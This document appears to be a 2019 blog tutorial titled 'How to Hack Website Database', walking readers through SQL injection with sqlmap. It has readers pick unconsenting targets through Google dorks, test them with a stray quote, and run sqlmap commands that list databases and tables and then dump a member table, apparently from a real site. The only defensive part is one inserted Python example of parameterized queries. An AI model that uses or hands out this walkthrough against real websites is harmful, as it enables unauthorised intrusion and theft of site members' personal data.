How to Hack Website Database 2019 (UPDATED)

Hello guys, in today’s article we are going to see how hackers hack the database of a vulnerable website. There are many ways to hack a website’s database, but in today’s post we are going to see how it is done using SQL injection.

We can hack the website’s database using two different techniques: 1.) the manual way (performing the attack manually by passing arguments in the URL) 2.) automatic injection (SQLMAP)

In this article I am going to use the SQLMAP tool. If you are a beginner then go with the manual way; if you can’t find the manual way, comment below and I will try to explain it in another article.

So let’s start

What is SQL injection?

  • SQL injection is a type of attack used to extract data from a website’s database without credentials
  • in other words, it means accessing all the personal data of a website without the website’s credentials
  • we can do many things with SQL injection
    • hacking websites (defacement, etc.)
    • extracting data from the database
    • login bypass

Step 1:

First, find a website that is vulnerable to SQL injection. For that, you can use Google dorks.

  • GOOGLE Dorks for SQL injection:

    • home.php?cat=
    • view_items.php?id=
    • product.php?sku=
    • main.php?id=

Find vulnerable websites using the above dorks. If you don’t know how to use dorks, comment below and I will write an article on it.

Step 2:

After finding websites, check whether a website is vulnerable to SQL injection or not. For that, put a single quote ( ‘ ) at the end of the URL and hit enter. If there is any kind of SQL error then it’s vulnerable, else find another website (Example:- https://www.example.com/index.php?id=1′ )

If you get a result similar to the image below then it’s vulnerable to SQL injection.

Example:

[Image: sql_injection]
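
Why the quote in Step 2 produces an SQL error, and what the fix looks like, as an added example that is not part of the original article: a query built by pasting the URL value into the SQL text fails to parse on a stray quote, while a bound parameter treats the same value as data. The in-memory SQLite database, the `items` table and the function names are assumptions made for illustration.

```python
import sqlite3

def make_db():
    """Constructed sample data: an in-memory table standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)", [(1, "lamp"), (2, "desk")])
    return conn

def lookup_concat(conn, raw_id):
    """Vulnerable pattern: the URL value is pasted into the SQL text."""
    sql = "SELECT name FROM items WHERE id = " + raw_id
    try:
        return ("ok", [r[0] for r in conn.execute(sql)])
    except sqlite3.Error as exc:
        # Echoing the database error to the client is the signal described in Step 2.
        return ("sql_error", str(exc))

def lookup_param(conn, raw_id):
    """Hardened pattern: validate the type, then bind the value as a parameter."""
    if not raw_id.isascii() or not raw_id.isdigit():
        return ("bad_request", [])  # generic response, no database detail
    rows = conn.execute("SELECT name FROM items WHERE id = ?", (int(raw_id),))
    return ("ok", [r[0] for r in rows])

def bound_without_validation(conn, raw_id):
    """Binding alone: the quote is compared as data and never parsed as SQL."""
    rows = conn.execute("SELECT name FROM items WHERE id = ?", (raw_id,))
    return [r[0] for r in rows]

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'"):
        print(repr(value), lookup_concat(db, value), lookup_param(db, value))
```

The bound parameter is what removes the injection. The input validation and the generic error response are defence in depth that also stop the page from revealing database errors.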

 

Step 3:

Now we have a vulnerable website (I assume you also have one), so let’s begin. Open your terminal and type (” sqlmap -u ‘https://target-website.pk/index.php?id=1’ –dbs”) without the double quotes to fetch the databases of the specified website. We did not perform the vulnerability checking stage in sqlmap, because we manually verified whether an SQL injection vulnerability is present in the site or not.

Example:

The command for fetching database

[Image: sqlmap scanning]

Fetched Database

[Image: database hacking]

Step 4:

We got the database names (“dailypak_dailypak”, “information_schema”) as shown in the above images. Now we try to fetch the tables available inside that database.

We are going to fetch tables from the ‘dailypak_dailypak’ database. For that, type the following command (” sqlmap -u ‘https://target-website.pk/index.php?id=1’ –tables -D dailypak_dailypak “) without the double quotes and press enter.

Example:

Fetching Tables

[Image: fetching tables]

Fetched Tables

[Image: fetched tables sqlmap]

Step 5:

Here we got all the tables that are available in the database. Now let’s find the columns that are available in the tables.

For that, type the following command (” sqlmap -u ‘https://target-website.com/index.php?id=1’ –columns -D dailypak_dailypak  -T  member “) without the double quotes and press enter.

Example:

Fetching Columns

[Image: fetch column sqlmap]

Columns Fetched

[Image: fetch column sql map]

Step 6:

Now we have the required columns and we can dump all the data that is stored inside this table’s columns, so let’s dump (fetch) it.

Type the following command (” sqlmap -u ‘https://target-site.com/index.php?id=1’ –dump -D dailypak_dailypak  -T  member ” ) without the double quotes and hit enter. It will take some time, then display the result and automatically store it in a “.csv” file. You can find the path at the bottom of the terminal.

Example:

Hacked Database Data

[Image: database hacked using sqlmap]

Path of the saved database file

[Image: sqlmap save path]

So friends, here’s the tutorial on how to hack a website database. Subscribe to notifications for future articles and let us know your thoughts on this article by commenting. Thanks for reading, see you again.
